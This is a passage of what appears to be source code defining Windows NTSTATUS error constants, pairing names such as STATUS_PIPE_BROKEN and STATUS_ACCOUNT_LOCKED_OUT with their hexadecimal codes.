0xC000013A STATUS_LOCAL_DISCONNECT = 0xC000013B STATUS_REMOTE_DISCONNECT = 0xC000013C STATUS_REMOTE_RESOURCES = 0xC000013D STATUS_LINK_FAILED = 0xC000013E STATUS_LINK_TIMEOUT = 0xC000013F STATUS_INVALID_CONNECTION = 0xC0000140 STATUS_INVALID_ADDRESS = 0xC0000141 STATUS_DLL_INIT_FAILED = 0xC0000142 STATUS_MISSING_SYSTEMFILE = 0xC0000143 STATUS_UNHANDLED_EXCEPTION = 0xC0000144 STATUS_APP_INIT_FAILURE = 0xC0000145 STATUS_PAGEFILE_CREATE_FAILED = 0xC0000146 STATUS_NO_PAGEFILE = 0xC0000147 STATUS_INVALID_LEVEL = 0xC0000148 STATUS_WRONG_PASSWORD_CORE = 0xC0000149 STATUS_ILLEGAL_FLOAT_CONTEXT = 0xC000014A STATUS_PIPE_BROKEN = 0xC000014B STATUS_REGISTRY_CORRUPT = 0xC000014C STATUS_REGISTRY_IO_FAILED = 0xC000014D STATUS_NO_EVENT_PAIR = 0xC000014E STATUS_UNRECOGNIZED_VOLUME = 0xC000014F STATUS_SERIAL_NO_DEVICE_INITED = 0xC0000150 STATUS_NO_SUCH_ALIAS = 0xC0000151 STATUS_MEMBER_NOT_IN_ALIAS = 0xC0000152 STATUS_MEMBER_IN_ALIAS = 0xC0000153 STATUS_ALIAS_EXISTS = 0xC0000154 STATUS_LOGON_NOT_GRANTED = 0xC0000155 STATUS_TOO_MANY_SECRETS = 0xC0000156 STATUS_SECRET_TOO_LONG = 0xC0000157 STATUS_INTERNAL_DB_ERROR = 0xC0000158 STATUS_FULLSCREEN_MODE = 0xC0000159 STATUS_TOO_MANY_CONTEXT_IDS = 0xC000015A STATUS_LOGON_TYPE_NOT_GRANTED = 0xC000015B STATUS_NOT_REGISTRY_FILE = 0xC000015C STATUS_NT_CROSS_ENCRYPTION_REQUIRED = 0xC000015D STATUS_DOMAIN_CTRLR_CONFIG_ERROR = 0xC000015E STATUS_FT_MISSING_MEMBER = 0xC000015F STATUS_ILL_FORMED_SERVICE_ENTRY = 0xC0000160 STATUS_ILLEGAL_CHARACTER = 0xC0000161 STATUS_UNMAPPABLE_CHARACTER = 0xC0000162 STATUS_UNDEFINED_CHARACTER = 0xC0000163 STATUS_FLOPPY_VOLUME = 0xC0000164 STATUS_FLOPPY_ID_MARK_NOT_FOUND = 0xC0000165 STATUS_FLOPPY_WRONG_CYLINDER = 0xC0000166 STATUS_FLOPPY_UNKNOWN_ERROR = 0xC0000167 STATUS_FLOPPY_BAD_REGISTERS = 0xC0000168 STATUS_DISK_RECALIBRATE_FAILED = 0xC0000169 STATUS_DISK_OPERATION_FAILED = 0xC000016A STATUS_DISK_RESET_FAILED = 0xC000016B STATUS_SHARED_IRQ_BUSY = 0xC000016C STATUS_FT_ORPHANING = 0xC000016D STATUS_BIOS_FAILED_TO_CONNECT_INTERRUPT = 0xC000016E STATUS_PARTITION_FAILURE = 0xC0000172 STATUS_INVALID_BLOCK_LENGTH = 0xC0000173 STATUS_DEVICE_NOT_PARTITIONED = 0xC0000174 STATUS_UNABLE_TO_LOCK_MEDIA = 0xC0000175 STATUS_UNABLE_TO_UNLOAD_MEDIA = 0xC0000176 STATUS_EOM_OVERFLOW = 0xC0000177 STATUS_NO_MEDIA = 0xC0000178 STATUS_NO_SUCH_MEMBER = 0xC000017A STATUS_INVALID_MEMBER = 0xC000017B STATUS_KEY_DELETED = 0xC000017C STATUS_NO_LOG_SPACE = 0xC000017D STATUS_TOO_MANY_SIDS = 0xC000017E STATUS_LM_CROSS_ENCRYPTION_REQUIRED = 0xC000017F STATUS_KEY_HAS_CHILDREN = 0xC0000180 STATUS_CHILD_MUST_BE_VOLATILE = 0xC0000181 STATUS_DEVICE_CONFIGURATION_ERROR = 0xC0000182 STATUS_DRIVER_INTERNAL_ERROR = 0xC0000183 STATUS_INVALID_DEVICE_STATE = 0xC0000184 STATUS_IO_DEVICE_ERROR = 0xC0000185 STATUS_DEVICE_PROTOCOL_ERROR = 0xC0000186 STATUS_BACKUP_CONTROLLER = 0xC0000187 STATUS_LOG_FILE_FULL = 0xC0000188 STATUS_TOO_LATE = 0xC0000189 STATUS_NO_TRUST_LSA_SECRET = 0xC000018A STATUS_NO_TRUST_SAM_ACCOUNT = 0xC000018B STATUS_TRUSTED_DOMAIN_FAILURE = 0xC000018C STATUS_TRUSTED_RELATIONSHIP_FAILURE = 0xC000018D STATUS_EVENTLOG_FILE_CORRUPT = 0xC000018E STATUS_EVENTLOG_CANT_START = 0xC000018F STATUS_TRUST_FAILURE = 0xC0000190 STATUS_MUTANT_LIMIT_EXCEEDED = 0xC0000191 STATUS_NETLOGON_NOT_STARTED = 0xC0000192 STATUS_ACCOUNT_EXPIRED = 0xC0000193 STATUS_POSSIBLE_DEADLOCK = 0xC0000194 STATUS_NETWORK_CREDENTIAL_CONFLICT = 0xC0000195 STATUS_REMOTE_SESSION_LIMIT = 0xC0000196 STATUS_EVENTLOG_FILE_CHANGED = 0xC0000197 STATUS_NOLOGON_INTERDOMAIN_TRUST_ACCOUNT = 0xC0000198 STATUS_NOLOGON_WORKSTATION_TRUST_ACCOUNT = 0xC0000199 STATUS_NOLOGON_SERVER_TRUST_ACCOUNT = 0xC000019A STATUS_DOMAIN_TRUST_INCONSISTENT = 0xC000019B STATUS_FS_DRIVER_REQUIRED = 0xC000019C STATUS_IMAGE_ALREADY_LOADED_AS_DLL = 0xC000019D STATUS_INCOMPATIBLE_WITH_GLOBAL_SHORT_NAME_REGISTRY_SETTING = 0xC000019E STATUS_SHORT_NAMES_NOT_ENABLED_ON_VOLUME = 0xC000019F STATUS_SECURITY_STREAM_IS_INCONSISTENT = 0xC00001A0 STATUS_INVALID_LOCK_RANGE = 0xC00001A1 STATUS_INVALID_ACE_CONDITION = 0xC00001A2 STATUS_IMAGE_SUBSYSTEM_NOT_PRESENT = 0xC00001A3 STATUS_NOTIFICATION_GUID_ALREADY_DEFINED = 0xC00001A4 STATUS_NETWORK_OPEN_RESTRICTION = 0xC0000201 STATUS_NO_USER_SESSION_KEY = 0xC0000202 STATUS_USER_SESSION_DELETED = 0xC0000203 STATUS_RESOURCE_LANG_NOT_FOUND = 0xC0000204 STATUS_INSUFF_SERVER_RESOURCES = 0xC0000205 STATUS_INVALID_BUFFER_SIZE = 0xC0000206 STATUS_INVALID_ADDRESS_COMPONENT = 0xC0000207 STATUS_INVALID_ADDRESS_WILDCARD = 0xC0000208 STATUS_TOO_MANY_ADDRESSES = 0xC0000209 STATUS_ADDRESS_ALREADY_EXISTS = 0xC000020A STATUS_ADDRESS_CLOSED = 0xC000020B STATUS_CONNECTION_DISCONNECTED = 0xC000020C STATUS_CONNECTION_RESET = 0xC000020D STATUS_TOO_MANY_NODES = 0xC000020E STATUS_TRANSACTION_ABORTED = 0xC000020F STATUS_TRANSACTION_TIMED_OUT = 0xC0000210 STATUS_TRANSACTION_NO_RELEASE = 0xC0000211 STATUS_TRANSACTION_NO_MATCH = 0xC0000212 STATUS_TRANSACTION_RESPONDED = 0xC0000213 STATUS_TRANSACTION_INVALID_ID = 0xC0000214 STATUS_TRANSACTION_INVALID_TYPE = 0xC0000215 STATUS_NOT_SERVER_SESSION = 0xC0000216 STATUS_NOT_CLIENT_SESSION = 0xC0000217 STATUS_CANNOT_LOAD_REGISTRY_FILE = 0xC0000218 STATUS_DEBUG_ATTACH_FAILED = 0xC0000219 STATUS_SYSTEM_PROCESS_TERMINATED = 0xC000021A STATUS_DATA_NOT_ACCEPTED = 0xC000021B STATUS_NO_BROWSER_SERVERS_FOUND = 0xC000021C STATUS_VDM_HARD_ERROR = 0xC000021D STATUS_DRIVER_CANCEL_TIMEOUT = 0xC000021E STATUS_REPLY_MESSAGE_MISMATCH = 0xC000021F STATUS_MAPPED_ALIGNMENT = 0xC0000220 STATUS_IMAGE_CHECKSUM_MISMATCH = 0xC0000221 STATUS_LOST_WRITEBEHIND_DATA = 0xC0000222 STATUS_CLIENT_SERVER_PARAMETERS_INVALID = 0xC0000223 STATUS_PASSWORD_MUST_CHANGE = 0xC0000224 STATUS_NOT_FOUND = 0xC0000225 STATUS_NOT_TINY_STREAM = 0xC0000226 STATUS_RECOVERY_FAILURE = 0xC0000227 STATUS_STACK_OVERFLOW_READ = 0xC0000228 STATUS_FAIL_CHECK = 0xC0000229 STATUS_DUPLICATE_OBJECTID = 0xC000022A STATUS_OBJECTID_EXISTS = 0xC000022B STATUS_CONVERT_TO_LARGE = 0xC000022C STATUS_RETRY = 0xC000022D STATUS_FOUND_OUT_OF_SCOPE = 0xC000022E STATUS_ALLOCATE_BUCKET = 0xC000022F STATUS_PROPSET_NOT_FOUND = 0xC0000230 STATUS_MARSHALL_OVERFLOW = 0xC0000231 STATUS_INVALID_VARIANT = 0xC0000232 STATUS_DOMAIN_CONTROLLER_NOT_FOUND = 0xC0000233 STATUS_ACCOUNT_LOCKED_OUT = 0xC0000234 STATUS_HANDLE_NOT_CLOSABLE = 0xC0000235 STATUS_CONNECTION_REFUSED = 0xC0000236 STATUS_GRACEFUL_DISCONNECT = 0xC0000237 STATUS_ADDRESS_ALREADY_ASSOCIATED = 0xC0000238 STATUS_ADDRESS_NOT_ASSOCIATED = 0xC0000239 STATUS_CONNECTION_INVALID = 0xC000023A STATUS_CONNECTION_ACTIVE = 0xC000023B STATUS_NETWORK_UNREACHABLE = 0xC000023C STATUS_HOST_UNREACHABLE = 0xC000023D STATUS_PROTOCOL_UNREACHABLE = 0xC000023E STATUS_PORT_UNREACHABLE = 0xC000023F STATUS_REQUEST_ABORTED = 0xC0000240 STATUS_CONNECTION_ABORTED = 0xC0000241 STATUS_BAD_COMPRESSION_BUFFER = 0xC0000242 STATUS_USER_MAPPED_FILE = 0xC0000243 STATUS_AUDIT_FAILED = 0xC0000244 STATUS_TIMER_RESOLUTION_NOT_SET = 0xC0000245 STATUS_CONNECTION_COUNT_LIMIT = 0xC0000246 STATUS_LOGIN_TIME_RESTRICTION = 0xC0000247 STATUS_LOGIN_WKSTA_RESTRICTION = 0xC0000248 STATUS_IMAGE_MP_UP_MISMATCH = 0xC0000249 STATUS_INSUFFICIENT_LOGON_INFO = 0xC0000250 STATUS_BAD_DLL_ENTRYPOINT = 0xC0000251 STATUS_BAD_SERVICE_ENTRYPOINT = 0xC0000252 STATUS_LPC_REPLY_LOST = 0xC0000253 STATUS_IP_ADDRESS_CONFLICT1 = 0xC0000254 STATUS_IP_ADDRESS_CONFLICT2 = 0xC0000255 STATUS_REGISTRY_QUOTA_LIMIT = 0xC0000256 STATUS_PATH_NOT_COVERED = 0xC0000257 STATUS_NO_CALLBACK_ACTIVE = 0xC0000258 STATUS_LICENSE_QUOTA_EXCEEDED = 0xC0000259 STATUS_PWD_TOO_SHORT = 0xC000025A STATUS_PWD_TOO_RECENT = 0xC000025B STATUS_PWD_HISTORY_CONFLICT = 0xC000025C STATUS_PLUGPLAY_NO_DEVICE = 0xC000025E STATUS_UNSUPPORTED_COMPRESSION = 0xC000025F STATUS_INVALID_HW_PROFILE = 0xC0000260 STATUS_INVALID_PLUGPLAY_DEVICE_PATH = 0xC0000261 STATUS_DRIVER_ORDINAL_NOT_FOUND = 0xC0000262 STATUS_DRIVER_ENTRYPOINT_NOT_FOUND = 0xC0000263 STATUS_RESOURCE_NOT_OWNED = 0xC0000264 STATUS_TOO_MANY_LINKS = 0xC0000265 STATUS_QUOTA_LIST_INCONSISTENT = 0xC0000266 STATUS_FILE_IS_OFFLINE = 0xC0000267 STATUS_EVALUATION_EXPIRATION = 0xC0000268 STATUS_ILLEGAL_DLL_RELOCATION = 0xC0000269 STATUS_LICENSE_VIOLATION = 0xC000026A STATUS_DLL_INIT_FAILED_LOGOFF = 0xC000026B STATUS_DRIVER_UNABLE_TO_LOAD = 0xC000026C STATUS_DFS_UNAVAILABLE = 0xC000026D STATUS_VOLUME_DISMOUNTED = 0xC000026E STATUS_WX86_INTERNAL_ERROR = 0xC000026F STATUS_WX86_FLOAT_STACK_CHECK = 0xC0000270 STATUS_VALIDATE_CONTINUE = 0xC0000271 STATUS_NO_MATCH = 0xC0000272 STATUS_NO_MORE_MATCHES = 0xC0000273 STATUS_NOT_A_REPARSE_POINT = 0xC0000275 STATUS_IO_REPARSE_TAG_INVALID = 0xC0000276 STATUS_IO_REPARSE_TAG_MISMATCH = 0xC0000277 STATUS_IO_REPARSE_DATA_INVALID = 0xC0000278 STATUS_IO_REPARSE_TAG_NOT_HANDLED = 0xC0000279 STATUS_REPARSE_POINT_NOT_RESOLVED = 0xC0000280 STATUS_DIRECTORY_IS_A_REPARSE_POINT = 0xC0000281 STATUS_RANGE_LIST_CONFLICT = 0xC0000282 STATUS_SOURCE_ELEMENT_EMPTY = 0xC0000283 STATUS_DESTINATION_ELEMENT_FULL = 0xC0000284 STATUS_ILLEGAL_ELEMENT_ADDRESS = 0xC0000285 STATUS_MAGAZINE_NOT_PRESENT = 0xC0000286 STATUS_REINITIALIZATION_NEEDED = 0xC0000287 STATUS_ENCRYPTION_FAILED = 0xC000028A STATUS_DECRYPTION_FAILED = 0xC000028B STATUS_RANGE_NOT_FOUND = 0xC000028C STATUS_NO_RECOVERY_POLICY = 0xC000028D STATUS_NO_EFS = 0xC000028E STATUS_WRONG_EFS = 0xC000028F STATUS_NO_USER_KEYS = 0xC0000290 STATUS_FILE_NOT_ENCRYPTED = 0xC0000291 STATUS_NOT_EXPORT_FORMAT = 0xC0000292 STATUS_FILE_ENCRYPTED = 0xC0000293 STATUS_WMI_GUID_NOT_FOUND = 0xC0000295 STATUS_WMI_INSTANCE_NOT_FOUND = 0xC0000296 STATUS_WMI_ITEMID_NOT_FOUND = 0xC0000297 STATUS_WMI_TRY_AGAIN = 0xC0000298 STATUS_SHARED_POLICY = 0xC0000299 STATUS_POLICY_OBJECT_NOT_FOUND = 0xC000029A STATUS_POLICY_ONLY_IN_DS = 0xC000029B STATUS_VOLUME_NOT_UPGRADED = 0xC000029C STATUS_REMOTE_STORAGE_NOT_ACTIVE = 0xC000029D STATUS_REMOTE_STORAGE_MEDIA_ERROR = 0xC000029E STATUS_NO_TRACKING_SERVICE = 0xC000029F STATUS_SERVER_SID_MISMATCH = 0xC00002A0 STATUS_DS_NO_ATTRIBUTE_OR_VALUE = 0xC00002A1 STATUS_DS_INVALID_ATTRIBUTE_SYNTAX = 0xC00002A2 STATUS_DS_ATTRIBUTE_TYPE_UNDEFINED = 0xC00002A3 STATUS_DS_ATTRIBUTE_OR_VALUE_EXISTS = 0xC00002A4 STATUS_DS_BUSY = 0xC00002A5 STATUS_DS_UNAVAILABLE = 0xC00002A6 STATUS_DS_NO_RIDS_ALLOCATED = 0xC00002A7 STATUS_DS_NO_MORE_RIDS = 0xC00002A8 STATUS_DS_INCORRECT_ROLE_OWNER = 0xC00002A9 STATUS_DS_RIDMGR_INIT_ERROR = 0xC00002AA STATUS_DS_OBJ_CLASS_VIOLATION = 0xC00002AB STATUS_DS_CANT_ON_NON_LEAF = 0xC00002AC STATUS_DS_CANT_ON_RDN = 0xC00002AD STATUS_DS_CANT_MOD_OBJ_CLASS = 0xC00002AE STATUS_DS_CROSS_DOM_MOVE_FAILED = 0xC00002AF STATUS_DS_GC_NOT_AVAILABLE = 0xC00002B0 STATUS_DIRECTORY_SERVICE_REQUIRED = 0xC00002B1 STATUS_REPARSE_ATTRIBUTE_CONFLICT = 0xC00002B2 STATUS_CANT_ENABLE_DENY_ONLY = 0xC00002B3 STATUS_FLOAT_MULTIPLE_FAULTS = 0xC00002B4 STATUS_FLOAT_MULTIPLE_TRAPS = 0xC00002B5 STATUS_DEVICE_REMOVED = 0xC00002B6 STATUS_JOURNAL_DELETE_IN_PROGRESS = 0xC00002B7 STATUS_JOURNAL_NOT_ACTIVE = 0xC00002B8 STATUS_NOINTERFACE = 0xC00002B9 STATUS_DS_ADMIN_LIMIT_EXCEEDED = 0xC00002C1 STATUS_DRIVER_FAILED_SLEEP = 0xC00002C2 STATUS_MUTUAL_AUTHENTICATION_FAILED = 0xC00002C3 STATUS_CORRUPT_SYSTEM_FILE = 0xC00002C4 STATUS_DATATYPE_MISALIGNMENT_ERROR = 0xC00002C5 STATUS_WMI_READ_ONLY = 0xC00002C6 STATUS_WMI_SET_FAILURE = 0xC00002C7 STATUS_COMMITMENT_MINIMUM = 0xC00002C8 STATUS_REG_NAT_CONSUMPTION = 0xC00002C9 STATUS_TRANSPORT_FULL = 0xC00002CA STATUS_DS_SAM_INIT_FAILURE = 0xC00002CB STATUS_ONLY_IF_CONNECTED = 0xC00002CC STATUS_DS_SENSITIVE_GROUP_VIOLATION = 0xC00002CD STATUS_PNP_RESTART_ENUMERATION = 0xC00002CE STATUS_JOURNAL_ENTRY_DELETED = 0xC00002CF STATUS_DS_CANT_MOD_PRIMARYGROUPID = 0xC00002D0 STATUS_SYSTEM_IMAGE_BAD_SIGNATURE = 0xC00002D1 STATUS_PNP_REBOOT_REQUIRED = 0xC00002D2 STATUS_POWER_STATE_INVALID = 0xC00002D3 STATUS_DS_INVALID_GROUP_TYPE = 0xC00002D4 STATUS_DS_NO_NEST_GLOBALGROUP_IN_MIXEDDOMAIN = 0xC00002D5 STATUS_DS_NO_NEST_LOCALGROUP_IN_MIXEDDOMAIN = 0xC00002D6 STATUS_DS_GLOBAL_CANT_HAVE_LOCAL_MEMBER = 0xC00002D7 STATUS_DS_GLOBAL_CANT_HAVE_UNIVERSAL_MEMBER = 0xC00002D8 STATUS_DS_UNIVERSAL_CANT_HAVE_LOCAL_MEMBER = 0xC00002D9 STATUS_DS_GLOBAL_CANT_HAVE_CROSSDOMAIN_MEMBER = 0xC00002DA STATUS_DS_LOCAL_CANT_HAVE_CROSSDOMAIN_LOCAL_MEMBER = 0xC00002DB STATUS_DS_HAVE_PRIMARY_MEMBERS = 0xC00002DC STATUS_WMI_NOT_SUPPORTED = 0xC00002DD STATUS_INSUFFICIENT_POWER = 0xC00002DE STATUS_SAM_NEED_BOOTKEY_PASSWORD = 0xC00002DF STATUS_SAM_NEED_BOOTKEY_FLOPPY = 0xC00002E0 STATUS_DS_CANT_START = 0xC00002E1 STATUS_DS_INIT_FAILURE = 0xC00002E2 STATUS_SAM_INIT_FAILURE = 0xC00002E3 STATUS_DS_GC_REQUIRED = 0xC00002E4 STATUS_DS_LOCAL_MEMBER_OF_LOCAL_ONLY = 0xC00002E5 STATUS_DS_NO_FPO_IN_UNIVERSAL_GROUPS = 0xC00002E6 STATUS_DS_MACHINE_ACCOUNT_QUOTA_EXCEEDED = 0xC00002E7 STATUS_CURRENT_DOMAIN_NOT_ALLOWED = 0xC00002E9 STATUS_CANNOT_MAKE = 0xC00002EA STATUS_SYSTEM_SHUTDOWN = 0xC00002EB STATUS_DS_INIT_FAILURE_CONSOLE = 0xC00002EC STATUS_DS_SAM_INIT_FAILURE_CONSOLE = 0xC00002ED STATUS_UNFINISHED_CONTEXT_DELETED = 0xC00002EE STATUS_NO_TGT_REPLY = 0xC00002EF STATUS_OBJECTID_NOT_FOUND = 0xC00002F0 STATUS_NO_IP_ADDRESSES = 0xC00002F1 STATUS_WRONG_CREDENTIAL_HANDLE = 0xC00002F2 STATUS_CRYPTO_SYSTEM_INVALID = 0xC00002F3 STATUS_MAX_REFERRALS_EXCEEDED = 0xC00002F4 STATUS_MUST_BE_KDC = 0xC00002F5 STATUS_STRONG_CRYPTO_NOT_SUPPORTED = 0xC00002F6 STATUS_TOO_MANY_PRINCIPALS = 0xC00002F7 STATUS_NO_PA_DATA = 0xC00002F8 STATUS_PKINIT_NAME_MISMATCH = 0xC00002F9 STATUS_SMARTCARD_LOGON_REQUIRED = 0xC00002FA STATUS_KDC_INVALID_REQUEST = 0xC00002FB STATUS_KDC_UNABLE_TO_REFER = 0xC00002FC STATUS_KDC_UNKNOWN_ETYPE = 0xC00002FD STATUS_SHUTDOWN_IN_PROGRESS = 0xC00002FE STATUS_SERVER_SHUTDOWN_IN_PROGRESS = 0xC00002FF STATUS_NOT_SUPPORTED_ON_SBS = 0xC0000300 STATUS_WMI_GUID_DISCONNECTED = 0xC0000301 STATUS_WMI_ALREADY_DISABLED = 0xC0000302 STATUS_WMI_ALREADY_ENABLED = 0xC0000303 STATUS_MFT_TOO_FRAGMENTED = 0xC0000304 STATUS_COPY_PROTECTION_FAILURE = 0xC0000305 STATUS_CSS_AUTHENTICATION_FAILURE = 0xC0000306 STATUS_CSS_KEY_NOT_PRESENT = 0xC0000307 STATUS_CSS_KEY_NOT_ESTABLISHED = 0xC0000308 STATUS_CSS_SCRAMBLED_SECTOR = 0xC0000309 STATUS_CSS_REGION_MISMATCH = 0xC000030A STATUS_CSS_RESETS_EXHAUSTED = 0xC000030B STATUS_PKINIT_FAILURE = 0xC0000320 STATUS_SMARTCARD_SUBSYSTEM_FAILURE = 0xC0000321 STATUS_NO_KERB_KEY = 0xC0000322 STATUS_HOST_DOWN = 0xC0000350 STATUS_UNSUPPORTED_PREAUTH = 0xC0000351 STATUS_EFS_ALG_BLOB_TOO_BIG = 0xC0000352 STATUS_PORT_NOT_SET = 0xC0000353 STATUS_DEBUGGER_INACTIVE = 0xC0000354 STATUS_DS_VERSION_CHECK_FAILURE = 0xC0000355 STATUS_AUDITING_DISABLED = 0xC0000356 STATUS_PRENT4_MACHINE_ACCOUNT = 0xC0000357 STATUS_DS_AG_CANT_HAVE_UNIVERSAL_MEMBER = 0xC0000358 STATUS_INVALID_IMAGE_WIN_32 = 0xC0000359 STATUS_INVALID_IMAGE_WIN_64 = 0xC000035A STATUS_BAD_BINDINGS = 0xC000035B STATUS_NETWORK_SESSION_EXPIRED = 0xC000035C STATUS_APPHELP_BLOCK = 0xC000035D STATUS_ALL_SIDS_FILTERED = 0xC000035E STATUS_NOT_SAFE_MODE_DRIVER = 0xC000035F STATUS_ACCESS_DISABLED_BY_POLICY_DEFAULT = 0xC0000361 STATUS_ACCESS_DISABLED_BY_POLICY_PATH = 0xC0000362 STATUS_ACCESS_DISABLED_BY_POLICY_PUBLISHER = 0xC0000363 STATUS_ACCESS_DISABLED_BY_POLICY_OTHER = 0xC0000364 STATUS_FAILED_DRIVER_ENTRY = 0xC0000365 STATUS_DEVICE_ENUMERATION_ERROR = 0xC0000366 STATUS_MOUNT_POINT_NOT_RESOLVED = 0xC0000368 STATUS_INVALID_DEVICE_OBJECT_PARAMETER = 0xC0000369 STATUS_MCA_OCCURED = 0xC000036A STATUS_DRIVER_BLOCKED_CRITICAL = 0xC000036B STATUS_DRIVER_BLOCKED = 0xC000036C STATUS_DRIVER_DATABASE_ERROR = 0xC000036D STATUS_SYSTEM_HIVE_TOO_LARGE = 0xC000036E STATUS_INVALID_IMPORT_OF_NON_DLL = 0xC000036F STATUS_NO_SECRETS = 0xC0000371 STATUS_ACCESS_DISABLED_NO_SAFER_UI_BY_POLICY = 0xC0000372 STATUS_FAILED_STACK_SWITCH = 0xC0000373 STATUS_HEAP_CORRUPTION = 0xC0000374 STATUS_SMARTCARD_WRONG_PIN = 0xC0000380 STATUS_SMARTCARD_CARD_BLOCKED = 0xC0000381 STATUS_SMARTCARD_CARD_NOT_AUTHENTICATED = 0xC0000382 STATUS_SMARTCARD_NO_CARD = 0xC0000383 STATUS_SMARTCARD_NO_KEY_CONTAINER = 0xC0000384 STATUS_SMARTCARD_NO_CERTIFICATE = 0xC0000385 STATUS_SMARTCARD_NO_KEYSET = 0xC0000386 STATUS_SMARTCARD_IO_ERROR = 0xC0000387 STATUS_DOWNGRADE_DETECTED = 0xC0000388 STATUS_SMARTCARD_CERT_REVOKED = 0xC0000389 STATUS_ISSUING_CA_UNTRUSTED = 0xC000038A STATUS_REVOCATION_OFFLINE_C = 0xC000038B STATUS_PKINIT_CLIENT_FAILURE = 0xC000038C STATUS_SMARTCARD_CERT_EXPIRED = 0xC000038D STATUS_DRIVER_FAILED_PRIOR_UNLOAD = 0xC000038E STATUS_SMARTCARD_SILENT_CONTEXT = 0xC000038F STATUS_PER_USER_TRUST_QUOTA_EXCEEDED = 0xC0000401 STATUS_ALL_USER_TRUST_QUOTA_EXCEEDED = 0xC0000402 STATUS_USER_DELETE_TRUST_QUOTA_EXCEEDED = 0xC0000403 STATUS_DS_NAME_NOT_UNIQUE = 0xC0000404 STATUS_DS_DUPLICATE_ID_FOUND = 0xC0000405 STATUS_DS_GROUP_CONVERSION_ERROR = 0xC0000406 STATUS_VOLSNAP_PREPARE_HIBERNATE = 0xC0000407 STATUS_USER2USER_REQUIRED = 0xC0000408 STATUS_STACK_BUFFER_OVERRUN = 0xC0000409 STATUS_NO_S4U_PROT_SUPPORT = 0xC000040A STATUS_CROSSREALM_DELEGATION_FAILURE = 0xC000040B STATUS_REVOCATION_OFFLINE_KDC = 0xC000040C STATUS_ISSUING_CA_UNTRUSTED_KDC = 0xC000040D STATUS_KDC_CERT_EXPIRED = 0xC000040E STATUS_KDC_CERT_REVOKED = 0xC000040F STATUS_PARAMETER_QUOTA_EXCEEDED = 0xC0000410 STATUS_HIBERNATION_FAILURE = 0xC0000411 STATUS_DELAY_LOAD_FAILED = 0xC0000412 STATUS_AUTHENTICATION_FIREWALL_FAILED = 0xC0000413 STATUS_VDM_DISALLOWED = 0xC0000414 STATUS_HUNG_DISPLAY_DRIVER_THREAD = 0xC0000415 STATUS_INSUFFICIENT_RESOURCE_FOR_SPECIFIED_SHARED_SECTION_SIZE = 0xC0000416 STATUS_INVALID_CRUNTIME_PARAMETER = 0xC0000417 STATUS_NTLM_BLOCKED = 0xC0000418 STATUS_DS_SRC_SID_EXISTS_IN_FOREST = 0xC0000419 STATUS_DS_DOMAIN_NAME_EXISTS_IN_FOREST = 0xC000041A STATUS_DS_FLAT_NAME_EXISTS_IN_FOREST = 0xC000041B STATUS_INVALID_USER_PRINCIPAL_NAME = 0xC000041C STATUS_ASSERTION_FAILURE = 0xC0000420 STATUS_VERIFIER_STOP = 0xC0000421 STATUS_CALLBACK_POP_STACK = 0xC0000423 STATUS_INCOMPATIBLE_DRIVER_BLOCKED = 0xC0000424 STATUS_HIVE_UNLOADED = 0xC0000425 STATUS_COMPRESSION_DISABLED = 0xC0000426 STATUS_FILE_SYSTEM_LIMITATION = 0xC0000427 STATUS_INVALID_IMAGE_HASH = 0xC0000428 STATUS_NOT_CAPABLE = 0xC0000429 STATUS_REQUEST_OUT_OF_SEQUENCE = 0xC000042A STATUS_IMPLEMENTATION_LIMIT = 0xC000042B STATUS_ELEVATION_REQUIRED = 0xC000042C STATUS_NO_SECURITY_CONTEXT = 0xC000042D STATUS_PKU2U_CERT_FAILURE = 0xC000042E STATUS_BEYOND_VDL = 0xC0000432 STATUS_ENCOUNTERED_WRITE_IN_PROGRESS = 0xC0000433 STATUS_PTE_CHANGED = 0xC0000434 STATUS_PURGE_FAILED = 0xC0000435 STATUS_CRED_REQUIRES_CONFIRMATION = 0xC0000440 STATUS_CS_ENCRYPTION_INVALID_SERVER_RESPONSE = 0xC0000441 STATUS_CS_ENCRYPTION_UNSUPPORTED_SERVER = 0xC0000442 STATUS_CS_ENCRYPTION_EXISTING_ENCRYPTED_FILE = 0xC0000443 STATUS_CS_ENCRYPTION_NEW_ENCRYPTED_FILE = 0xC0000444 STATUS_CS_ENCRYPTION_FILE_NOT_CSE = 0xC0000445 STATUS_INVALID_LABEL = 0xC0000446 STATUS_DRIVER_PROCESS_TERMINATED = 0xC0000450 STATUS_AMBIGUOUS_SYSTEM_DEVICE = 0xC0000451 STATUS_SYSTEM_DEVICE_NOT_FOUND = 0xC0000452 STATUS_RESTART_BOOT_APPLICATION = 0xC0000453 STATUS_INSUFFICIENT_NVRAM_RESOURCES = 0xC0000454 STATUS_INVALID_TASK_NAME = 0xC0000500 STATUS_INVALID_TASK_INDEX = 0xC0000501 STATUS_THREAD_ALREADY_IN_TASK = 0xC0000502 STATUS_CALLBACK_BYPASS = 0xC0000503 STATUS_FAIL_FAST_EXCEPTION = 0xC0000602 STATUS_IMAGE_CERT_REVOKED = 0xC0000603 STATUS_PORT_CLOSED = 0xC0000700 STATUS_MESSAGE_LOST = 0xC0000701 STATUS_INVALID_MESSAGE = 0xC0000702 STATUS_REQUEST_CANCELED = 0xC0000703 STATUS_RECURSIVE_DISPATCH = 0xC0000704 STATUS_LPC_RECEIVE_BUFFER_EXPECTED = 0xC0000705 STATUS_LPC_INVALID_CONNECTION_USAGE = 0xC0000706 STATUS_LPC_REQUESTS_NOT_ALLOWED = 0xC0000707 STATUS_RESOURCE_IN_USE = 0xC0000708 STATUS_HARDWARE_MEMORY_ERROR = 0xC0000709 STATUS_THREADPOOL_HANDLE_EXCEPTION = 0xC000070A STATUS_THREADPOOL_SET_EVENT_ON_COMPLETION_FAILED = 0xC000070B STATUS_THREADPOOL_RELEASE_SEMAPHORE_ON_COMPLETION_FAILED = 0xC000070C STATUS_THREADPOOL_RELEASE_MUTEX_ON_COMPLETION_FAILED = 0xC000070D STATUS_THREADPOOL_FREE_LIBRARY_ON_COMPLETION_FAILED = 0xC000070E STATUS_THREADPOOL_RELEASED_DURING_OPERATION = 0xC000070F STATUS_CALLBACK_RETURNED_WHILE_IMPERSONATING = 0xC0000710 STATUS_APC_RETURNED_WHILE_IMPERSONATING = 0xC0000711 STATUS_PROCESS_IS_PROTECTED = 0xC0000712 STATUS_MCA_EXCEPTION = 0xC0000713 STATUS_CERTIFICATE_MAPPING_NOT_UNIQUE = 0xC0000714 STATUS_SYMLINK_CLASS_DISABLED = 0xC0000715 STATUS_INVALID_IDN_NORMALIZATION = 0xC0000716 STATUS_NO_UNICODE_TRANSLATION = 0xC0000717 STATUS_ALREADY_REGISTERED = 0xC0000718 STATUS_CONTEXT_MISMATCH = 0xC0000719 